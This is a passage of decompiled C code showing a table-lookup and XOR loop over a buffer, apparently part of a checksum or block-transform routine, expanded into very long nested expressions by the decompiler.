*(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t235 >> 0x18) * 4) ^  *(0x1325718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t177 >> 0x18) * 4) ^  *(0x1325718 + (_t177 & 0x000000ff) * 4) ^ _t250[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (_t241 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t241 >> 0x18) * 4) ^  *(0x1325718 + (_t241 & 0x000000ff) * 4) ^ _t250[5]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + 
(_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t235 >> 0x18) * 4) ^  *(0x1325718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 
0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + 
((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t235 >> 0x18) * 4) ^  *(0x1325718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t177 >> 0x18) * 4) ^  *(0x1325718 + (_t177 & 0x000000ff) * 4) ^ _t250[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (_t241 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t241 >> 0x18) * 4) ^  *(0x1325718 + (_t241 & 0x000000ff) * 4) ^ _t250[5]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t183 >> 0x18) * 4) ^  *(0x1325718 + (_t183 & 0x000000ff) * 4) ^ _t250[6];
                                                                                                                                                                                        						_t249 =  &(_t250[7]);
                                                                                                                                                                                        						_a8 = _t249;
                                                                                                                                                                                        						_t161 =  *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 
0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t235 >> 0x18) * 4) ^  *(0x1325718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) 
* 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) 
^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t235 >> 0x18) * 4) ^  *(0x1325718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t177 >> 0x18) * 4) ^  *(0x1325718 + (_t177 & 0x000000ff) * 4) ^ _t250[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (_t241 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t241 >> 0x18) * 4) ^  *(0x1325718 + (_t241 & 0x000000ff) * 4) ^ _t250[5]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 
+ (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t235 >> 0x18) * 4) ^  *(0x1325718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 
0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + (( *(0x1324f18 + 
((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (( *(0x1324f18 + ((_t161 ^  *_t189) >> 0x00000010 & _t222) * 4) ^  *(0x1325318 + (_t165 >> 0x00000008 & _t222) * 4) ^  *(0x1324b18 + (_t165 >> 0x18) * 4) ^  *(0x1325718 + (_t165 & 0x000000ff) * 4) ^  *_t250) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t229 >> 0x18) * 4) ^  *(0x1325718 + (_t229 & 0x000000ff) * 4) ^ _t250[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t171 >> 0x18) * 4) ^  *(0x1325718 + (_t171 & 0x000000ff) * 4) ^ _t250[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t235 >> 0x18) * 4) ^  *(0x1325718 + (_t235 & 0x000000ff) * 4) ^ _t250[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t177 >> 0x18) * 4) ^  *(0x1325718 + (_t177 & 0x000000ff) * 4) ^ _t250[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (_t241 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t241 >> 0x18) * 4) ^  *(0x1325718 + (_t241 & 0x000000ff) * 4) ^ _t250[5]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t183 >> 0x18) * 4) ^  *(0x1325718 + (_t183 & 0x000000ff) * 4) ^ _t250[6]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x1325318 + (_t247 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x1324b18 + (_t247 >> 0x18) * 4) ^  *(0x1325718 + (_t247 & 0x000000ff) * 4);
                                                                                                                                                                                        						_t84 =  &_a4;
                                                                                                                                                                                        						 *_t84 = _a4 - 1;
                                                                                                                                                                                        						if( *_t84 == 0) {
                                                                                                                                                                                        							break;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t189 = _a8;
                                                                                                                                                                                        						_t222 = 0xff;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_t248 >= 4) {
                                                                                                                                                                                        					_t224 = _t248 >> 2;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t164 = _t161 ^  *_t249;
                                                                                                                                                                                        						_t248 = _t248 - 4;
                                                                                                                                                                                        						_t249 =  &(_t249[4]);
